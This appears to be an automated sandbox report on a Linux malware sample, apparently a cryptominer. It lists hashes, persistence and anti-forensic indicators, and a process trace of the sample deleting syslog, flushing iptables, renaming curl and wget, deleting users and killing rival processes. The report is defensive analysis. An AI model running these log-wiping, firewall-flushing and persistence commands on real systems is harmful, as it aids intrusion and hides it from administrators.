4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612

General

Target

4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
Size

35KB
MD5

92fc64f05b1b0597acc58b7cc839a33b
SHA1

f9b3668004fb6810a3a6a44e31fb027782233dfc
SHA256

4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
SHA512

58431bb60c834224b567727db06c1f6adf0845b76aec00aa18200a0e5a1758e2422695c2ad7268db22e77ea57748adb05affb90bec56bd397d62416c4f885094
SSDEEP

384:EQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIDbS:oFNB48Fkc2zq0xvcGGIZ3L8eW

Score

9^/10

persistence

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Indicator Removal on Host
T1070

Processes:

rm

description ioc process

/var/log/syslog /var/log/syslog rm
Modifies the dynamic linker configuration file 1 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
persistence

Hijack Execution Flow
T1574

Processes:

description ioc process

/etc/ld.so.preload /etc/ld.so.preload
Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

egrep

description ioc process

/bin/egrep /bin/egrep egrep
Adds new SSH keys 1 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
persistence

Processes:

cat

description ioc process

/root/.ssh/authorized_keys /root/.ssh/authorized_keys cat
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
persistence

Scheduled Task
T1053

Processes:

cat

description ioc process

/var/spool/cron/ /var/spool/cron/ cat
Write file to user bin folder 1 TTPs 2 IoCs

Hijack Execution Flow
T1574

Processes:

rmrm

description ioc process

/usr/bin/config.json /usr/bin/config.json rm
/usr/bin/exin /usr/bin/exin rm
Writes file to shm directory 4 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.

Processes:

description ioc process

/dev/shm/.scr /dev/shm/.scr
/dev/shm/.kerberods /dev/shm/.kerberods
/dev/shm/z3.sh /dev/shm/z3.sh
/dev/shm/z2.sh /dev/shm/z2.sh

description	ioc	process
/var/log/syslog	/var/log/syslog	rm

description	ioc	process
/etc/ld.so.preload	/etc/ld.so.preload

description	ioc	process
/bin/egrep	/bin/egrep	egrep

description	ioc	process
/root/.ssh/authorized_keys	/root/.ssh/authorized_keys	cat

description	ioc	process
/var/spool/cron/	/var/spool/cron/	cat

description	ioc	process
/usr/bin/config.json	/usr/bin/config.json	rm
/usr/bin/exin	/usr/bin/exin	rm

description	ioc	process
/dev/shm/.scr	/dev/shm/.scr
/dev/shm/.kerberods	/dev/shm/.kerberods
/dev/shm/z3.sh	/dev/shm/z3.sh
/dev/shm/z2.sh	/dev/shm/z2.sh

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspkillpkillpspgreppgreppgreppkillpspspgreppkillpspspgreppspspspgreppgreppkillpkillpspspspgreppgreppgreppkillpkillpspkillpkillpspskillpkillpkillpspspspgreppspspspgreppkillpspkillpkillpspgreppgreppskillpgreppkillpkillpspgreppkillpspgreppkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pkillpspspspkillpkillpkillpspspgreppkillpkillpkillpspspspkillpgreppkillpspspspspspkillpkillpkillpspspspspgreppkillpkillpspspgreppspspspspgreppspspspspgreppkillpkillpspspspspgreppkillpsps

description	ioc	process
/proc/14/cmdline	/proc/14/cmdline	pkill
/proc/19/status	/proc/19/status	ps
/proc/2/stat	/proc/2/stat	ps
/proc/2/stat	/proc/2/stat	ps
/proc/19/status	/proc/19/status	pkill
/proc/19/status	/proc/19/status	pkill
/proc/71/status	/proc/71/status	pkill
/proc/71/status	/proc/71/status	ps
/proc/5/status	/proc/5/status	ps
/proc/8/cmdline	/proc/8/cmdline	pgrep
/proc/3/cmdline	/proc/3/cmdline	pkill
/proc/281/status	/proc/281/status	pkill
/proc/24/cmdline	/proc/24/cmdline	pkill
/proc/216/status	/proc/216/status	pkill
/proc/sys/kernel/osrelease	/proc/sys/kernel/osrelease	ps
/proc/144/status	/proc/144/status	ps
/proc/15/cmdline	/proc/15/cmdline	ps
/proc/242/status	/proc/242/status	pkill
/proc/320/cmdline	/proc/320/cmdline	pgrep
/proc/36/cmdline	/proc/36/cmdline	pkill
/proc/665/status	/proc/665/status	ps
/proc/7/cmdline	/proc/7/cmdline	ps
/proc/831/status	/proc/831/status	ps
/proc/22/cmdline	/proc/22/cmdline	ps
/proc/6/status	/proc/6/status	ps
/proc/71/stat	/proc/71/stat	ps
/proc/14/status	/proc/14/status	pkill
/proc/280/status	/proc/280/status	pkill
/proc/214/status	/proc/214/status	pkill
/proc/204/cmdline	/proc/204/cmdline	ps
/proc/320/stat	/proc/320/stat	ps
/proc/10/status	/proc/10/status	ps
/proc/3/stat	/proc/3/stat	ps
/proc/19/status	/proc/19/status	pgrep
/proc/18/status	/proc/18/status	pkill
/proc/8/status	/proc/8/status	pkill
/proc/15/status	/proc/15/status	ps
/proc/291/status	/proc/291/status	ps
/proc/273/status	/proc/273/status	pgrep
/proc/2/cmdline	/proc/2/cmdline	pgrep
/proc/stat	/proc/stat	ps
/proc/204/stat	/proc/204/stat	ps
/proc/36/cmdline	/proc/36/cmdline	ps
/proc/15/cmdline	/proc/15/cmdline	ps
/proc/273/status	/proc/273/status	ps
/proc/83/stat	/proc/83/stat	ps
/proc/72/cmdline	/proc/72/cmdline	pgrep
/proc/2/status	/proc/2/status	pkill
/proc/281/status	/proc/281/status	ps
/proc/20/cmdline	/proc/20/cmdline	ps
/proc/20/stat	/proc/20/stat	ps
/proc/212/cmdline	/proc/212/cmdline	ps
/proc/73/cmdline	/proc/73/cmdline	pgrep
/proc/3/status	/proc/3/status	pkill
/proc/322/status	/proc/322/status	pkill
/proc/138/stat	/proc/138/stat	ps
/proc/76/status	/proc/76/status	ps
/proc/13/stat	/proc/13/stat	ps
/proc/249/cmdline	/proc/249/cmdline	ps
/proc/78/cmdline	/proc/78/cmdline	pgrep
/proc/18/cmdline	/proc/18/cmdline	pkill
/proc/242/cmdline	/proc/242/cmdline	ps
/proc/821/cmdline	/proc/821/cmdline	ps
/proc/115/cmdline	/proc/115/cmdline	ps

Writes file to tmp directory 64 IoCs

Malware often drops required files in the /tmp directory.

Processes:

rmrmrmrmrmrmrmrmrmrmrmrmrmrmrmrm4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612rmrmrmrm

description	ioc	process
/tmp/.null	/tmp/.null	rm
/tmp/kworkerds	/tmp/kworkerds	rm
/tmp/.hod.tgz	/tmp/.hod.tgz
/tmp/.mynews1234	/tmp/.mynews1234
/tmp/.censusqqqqqqqqq	/tmp/.censusqqqqqqqqq
/tmp/1.so	/tmp/1.so	rm
/tmp/.abc	/tmp/.abc
/tmp/.tmpnewzz	/tmp/.tmpnewzz
/tmp/.rod	/tmp/.rod
/tmp/xd.json	/tmp/xd.json	rm
/tmp/dl	/tmp/dl	rm
/tmp/ddg	/tmp/ddg	rm
/tmp/osw.hb	/tmp/osw.hb
/tmp/.hod	/tmp/.hod
/tmp/.hod.tgz.1	/tmp/.hod.tgz.1
/tmp/.pt.tgz.1	/tmp/.pt.tgz.1
/tmp/keys	/tmp/keys	rm
/tmp/sustse	/tmp/sustse	rm
/tmp/syslogd	/tmp/syslogd	rm
/tmp/.tmpleve	/tmp/.tmpleve
/tmp/.rod.tgz.1	/tmp/.rod.tgz.1
/tmp/java	/tmp/java
/tmp/php	/tmp/php	rm
/tmp/systemctI	/tmp/systemctI
/tmp/.tmpleve	/tmp/.tmpleve
/tmp/84Onmce	/tmp/84Onmce
/tmp/go2.sh	/tmp/go2.sh
/tmp/.p	/tmp/.p
/tmp/runtime.sh	/tmp/runtime.sh
/tmp/ppol	/tmp/ppol	rm
/tmp/kworkerdssx	/tmp/kworkerdssx	rm
/tmp/.tmpc	/tmp/.tmpc
/tmp/3lmigMo	/tmp/3lmigMo
/tmp/java	/tmp/java
/tmp/khugepageds	/tmp/khugepageds
/tmp/kerberods	/tmp/kerberods
/tmp/walle*	/tmp/walle*	rm
/tmp/kworkerds3	/tmp/kworkerds3	rm
/tmp/65ccEJ7	/tmp/65ccEJ7	rm
/tmp/fs	/tmp/fs
/tmp/.mer.tgz	/tmp/.mer.tgz
/tmp/.pt	/tmp/.pt
/tmp/j2.conf	/tmp/j2.conf
/tmp/seasame	/tmp/seasame
/tmp/wc.conf	/tmp/wc.conf	rm
/tmp/conf.n	/tmp/conf.n
/tmp/.mer	/tmp/.mer
/tmp/go	/tmp/go
/tmp/.tmpnewasss	/tmp/.tmpnewasss
/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612	/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612	4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
/tmp/log_rot	/tmp/log_rot	rm
/tmp/p2.conf	/tmp/p2.conf	rm
/tmp/.mer.tgz.1	/tmp/.mer.tgz.1
/tmp/lib.tar.gz	/tmp/lib.tar.gz
/tmp/go.sh	/tmp/go.sh
/tmp/.profile	/tmp/.profile	rm
/tmp/jmxx	/tmp/jmxx	rm
/tmp/.omed	/tmp/.omed
/tmp/devtools	/tmp/devtools
/tmp/.rod.tgz.2	/tmp/.rod.tgz.2
/tmp/baby	/tmp/baby
/tmp/.pt.tgz	/tmp/.pt.tgz
/tmp/runtime2.sh	/tmp/runtime2.sh
/tmp/.rod.tgz	/tmp/.rod.tgz

/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
1⤵
- Writes file to tmp directory
PID:320

/bin/sync
sync
2⤵
PID:321

/bin/cat
cat /var/spool/cron/
2⤵
- Creates/modifies Cron job
PID:323

/bin/cat
cat /root/.ssh/authorized_keys
2⤵
- Adds new SSH keys
PID:326

/bin/mv
mv /usr/bin/curl /usr/bin/url
2⤵
PID:327

/bin/mv
mv /usr/bin/url /usr/bin/cd1
2⤵
PID:328

/bin/mv
mv /usr/bin/wget /usr/bin/get
2⤵
PID:329

/bin/mv
mv /usr/bin/get /usr/bin/wd1
2⤵
PID:330

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:331

/usr/bin/chattr
chattr -iua /tmp/
2⤵
PID:332

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
PID:333

/sbin/iptables
iptables -F
2⤵
PID:334

/usr/sbin/userdel
userdel akay
2⤵
PID:337

/usr/sbin/userdel
userdel vfinder
2⤵
PID:338

/bin/rm
rm -rf "/tmp/addres*"
2⤵
PID:339

/bin/rm
rm -rf "/tmp/walle*"
2⤵
- Writes file to tmp directory
PID:340

/bin/rm
rm -rf /tmp/keys
2⤵
- Writes file to tmp directory
PID:341

/bin/rm
rm -f /tmp/.null
2⤵
- Writes file to tmp directory
PID:342

/sbin/sysctl
sysctl -w "vm.nr_hugepages=128"
2⤵
PID:343

/bin/grep
grep 185.71.65.238
2⤵
PID:345

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:346

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:347

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:348

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:351

/bin/grep
grep 140.82.52.87
2⤵
PID:350

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:352

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:353

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:356

/bin/grep
grep -v -
2⤵
PID:358

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:357

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:359

/bin/grep
grep :443
2⤵
PID:355

/bin/grep
grep :23
2⤵
PID:361

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:362

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:363

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:365

/bin/grep
grep -v -
2⤵
PID:364

/bin/grep
grep :443
2⤵
PID:367

/bin/grep
grep -v -
2⤵
PID:370

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:368

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:369

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:371

/bin/grep
grep :143
2⤵
PID:373

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:375

/bin/grep
grep -v -
2⤵
PID:376

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:374

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:377

/bin/grep
grep :2222
2⤵
PID:379

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:381

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:380

/bin/grep
grep -v -
2⤵
PID:382

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:383

/bin/grep
grep :3333
2⤵
PID:385

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:386

/bin/grep
grep -v -
2⤵
PID:388

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:387

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:389

/bin/grep
grep :3389
2⤵
PID:391

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:393

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:392

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:395

/bin/grep
grep -v -
2⤵
PID:394

/bin/grep
grep :5555
2⤵
PID:397

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:398

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:399

/bin/grep
grep -v -
2⤵
PID:400

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:401

/bin/grep
grep :6666
2⤵
PID:403

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:404

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:405

/bin/grep
grep -v -
2⤵
PID:406

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:407

/bin/grep
grep :6665
2⤵
PID:409

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:410

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:411

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:413

/bin/grep
grep -v -
2⤵
PID:412

/bin/grep
grep :6667
2⤵
PID:415

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:416

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:417

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:419

/bin/grep
grep -v -
2⤵
PID:418

/bin/grep
grep :7777
2⤵
PID:421

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:423

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:422

/bin/grep
grep -v -
2⤵
PID:424

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:425

/bin/grep
grep :8444
2⤵
PID:427

/bin/grep
grep -v -
2⤵
PID:430

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:431

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:428

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:429

/bin/grep
grep :3347
2⤵
PID:433

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:434

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:435

/bin/grep
grep -v -
2⤵
PID:436

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:437

/bin/grep
grep :3333
2⤵
PID:440

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:441

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:438

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:442

/bin/grep
grep -v grep
2⤵
PID:439

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:443

/bin/grep
grep -v grep
2⤵
PID:444

/bin/grep
grep :5555
2⤵
PID:445

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:446

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:447

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:448

/bin/grep
grep -v grep
2⤵
PID:449

/bin/grep
grep "kworker -c\\"
2⤵
PID:450

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:452

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:451

/bin/grep
grep -v grep
2⤵
PID:454

/bin/ps
ps aux
2⤵
PID:453

/bin/grep
grep log_
2⤵
PID:455

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:456

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:457

/bin/grep
grep -v grep
2⤵
PID:459

/bin/ps
ps aux
2⤵
PID:458

/bin/grep
grep systemten
2⤵
PID:460

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:462

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:461

/bin/grep
grep -v grep
2⤵
PID:464

/bin/ps
ps aux
2⤵
PID:463

/bin/grep
grep netns
2⤵
PID:465

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:466

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:467

/usr/local/sbin/kill
kill -9 10
3⤵
PID:468

/usr/local/bin/kill
kill -9 10
3⤵
PID:468

/usr/sbin/kill
kill -9 10
3⤵
PID:468

/usr/bin/kill
kill -9 10
3⤵
PID:468

/sbin/kill
kill -9 10
3⤵
PID:468

/bin/kill
kill -9 10
3⤵
PID:468

/bin/grep
grep -v grep
2⤵
PID:470

/bin/ps
ps aux
2⤵
PID:469

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:472

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:473

/bin/grep
grep voltuned
2⤵
PID:471

/bin/grep
grep -v grep
2⤵
PID:475

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:477

/bin/ps
ps aux
2⤵
PID:474

/bin/grep
grep darwin
2⤵
PID:476

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:478

/bin/grep
grep -v grep
2⤵
PID:480

/bin/ps
ps aux
2⤵
PID:479

/bin/grep
grep /tmp/dl
2⤵
PID:481

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:482

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:483

/bin/grep
grep -v grep
2⤵
PID:485

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:484

/bin/grep
grep /tmp/ddg
2⤵
PID:486

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:487

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:488

/bin/grep
grep -v grep
2⤵
PID:490

/bin/ps
ps aux
2⤵
PID:489

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:492

/bin/grep
grep /tmp/pprt
2⤵
PID:491

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:493

/bin/grep
grep -v grep
2⤵
PID:495

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:497

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:494

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:498

/bin/grep
grep /tmp/ppol
2⤵
PID:496

/bin/grep
grep -v grep
2⤵
PID:500

/bin/ps
ps aux
2⤵
PID:499

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:502

/bin/grep
grep "/tmp/65ccE*"
2⤵
PID:501

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:503

/bin/grep
grep -v grep
2⤵
PID:505

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:507

/bin/grep
grep "/tmp/jmx*"
2⤵
PID:506

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:504

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:508

/bin/grep
grep -v grep
2⤵
PID:510

/bin/ps
ps aux
2⤵
PID:509

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:512

/bin/grep
grep "/tmp/2Ne80*"
2⤵
PID:511

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:513

/bin/grep
grep -v grep
2⤵
PID:515

/bin/ps
ps aux
2⤵
PID:514

/bin/grep
grep IOFoqIgyC0zmf2UR
2⤵
PID:516

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:517

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:518

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:519

/bin/grep
grep -v grep
2⤵
PID:520

/bin/grep
grep 45.76.122.92
2⤵
PID:521

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:522

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:523

/bin/grep
grep -v grep
2⤵
PID:525

/bin/ps
ps aux
2⤵
PID:524

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:527

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:528

/bin/grep
grep 51.38.191.178
2⤵
PID:526

/bin/ps
ps aux
2⤵
PID:529

/bin/grep
grep -v grep
2⤵
PID:530

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:532

/bin/grep
grep 51.15.56.161
2⤵
PID:531

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:533

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:534

/bin/grep
grep 86s.jpg
2⤵
PID:536

/bin/grep
grep -v grep
2⤵
PID:535

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:537

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:538

/bin/grep
grep -v grep
2⤵
PID:540

/bin/ps
ps aux
2⤵
PID:539

/bin/grep
grep aGTSGJJp
2⤵
PID:541

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:543

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:542

/bin/grep
grep -v grep
2⤵
PID:545

/bin/grep
grep nMrfmnRa
2⤵
PID:546

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:547

/bin/ps
ps aux
2⤵
PID:544

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:548

/bin/grep
grep -v grep
2⤵
PID:550

/bin/ps
ps aux
2⤵
PID:549

/bin/grep
grep PuNY5tm2
2⤵
PID:551

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:552

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:553

/bin/grep
grep -v grep
2⤵
PID:555

/bin/ps
ps aux
2⤵
PID:554

/bin/grep
grep I0r8Jyyt
2⤵
PID:556

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:557

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:558

/bin/grep
grep AgdgACUD
2⤵
PID:561

/bin/grep
grep -v grep
2⤵
PID:560

/bin/ps
ps aux
2⤵
PID:559

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:562

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:563

/bin/grep
grep uiZvwxG8
2⤵
PID:566

/bin/grep
grep -v grep
2⤵
PID:565

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:564

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:567

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:568

/bin/ps
ps aux
2⤵
PID:569

/bin/grep
grep -v grep
2⤵
PID:570

/bin/grep
grep hahwNEdB
2⤵
PID:571

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:572

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:573

/bin/grep
grep -v grep
2⤵
PID:575

/bin/grep
grep BtwXn5qH
2⤵
PID:576

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:577

/bin/ps
ps aux
2⤵
PID:574

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:578

/bin/grep
grep -v grep
2⤵
PID:580

/bin/grep
grep 3XEzey2T
2⤵
PID:581

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:582

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:579

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:583

/bin/grep
grep -v grep
2⤵
PID:585

/bin/ps
ps aux
2⤵
PID:584

/bin/grep
grep t2tKrCSZ
2⤵
PID:586

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:587

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:588

/bin/grep
grep -v grep
2⤵
PID:590

/bin/grep
grep svc
2⤵
PID:591

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:592

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:589

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:593

/bin/grep
grep HD7fcBgg
2⤵
PID:596

/bin/grep
grep -v grep
2⤵
PID:595

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:594

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:597

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:598

/bin/grep
grep zXcDajSs
2⤵
PID:601

/bin/grep
grep -v grep
2⤵
PID:600

/bin/ps
ps aux
2⤵
PID:599

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:602

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:603

/bin/ps
ps aux
2⤵
PID:604

/bin/grep
grep -v grep
2⤵
PID:605

/bin/grep
grep 3lmigMo
2⤵
PID:606

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:608

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:607

/bin/grep
grep -v grep
2⤵
PID:610

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:612

/bin/ps
ps aux
2⤵
PID:609

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:613

/bin/grep
grep AkMK4A2
2⤵
PID:611

/bin/grep
grep -v grep
2⤵
PID:615

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:614

/bin/grep
grep AJ2AkKe
2⤵
PID:616

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:617

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:618

/bin/grep
grep HiPxCJRS
2⤵
PID:621

/bin/grep
grep -v grep
2⤵
PID:620

/bin/ps
ps aux
2⤵
PID:619

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:622

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:623

/bin/grep
grep -v grep
2⤵
PID:625

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:624

/bin/grep
grep http_0xCC030
2⤵
PID:626

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:627

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:628

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:629

/bin/grep
grep -v grep
2⤵
PID:630

/bin/grep
grep http_0xCC031
2⤵
PID:631

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:633

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:632

/bin/ps
ps aux
2⤵
PID:634

/bin/grep
grep -v grep
2⤵
PID:635

/bin/grep
grep http_0xCC032
2⤵
PID:636

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:637

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:638

/bin/grep
grep -v grep
2⤵
PID:640

/bin/grep
grep http_0xCC033
2⤵
PID:641

/bin/ps
ps aux
2⤵
PID:639

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:642

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:643

/bin/grep
grep -v grep
2⤵
PID:645

/bin/ps
ps aux
2⤵
PID:644

/bin/grep
grep C4iLM4L
2⤵
PID:646

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:647

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:648

/bin/grep
grep -v grep
2⤵
PID:650

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:649

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:652

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:653

/bin/grep
grep aziplcr72qjhzvin
2⤵
PID:651

/bin/ps
ps aux
2⤵
PID:654

/usr/bin/awk
awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
2⤵
PID:656

/bin/grep
grep -v grep
2⤵
PID:655

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:657

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:658

/bin/grep
grep -v grep
2⤵
PID:659

/bin/grep
grep /boot/vmlinuz
2⤵
PID:660

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:661

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:662

/bin/grep
grep -v grep
2⤵
PID:664

/bin/grep
grep i4b503a52cc5
2⤵
PID:665

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:666

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:663

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:667

/bin/grep
grep -v grep
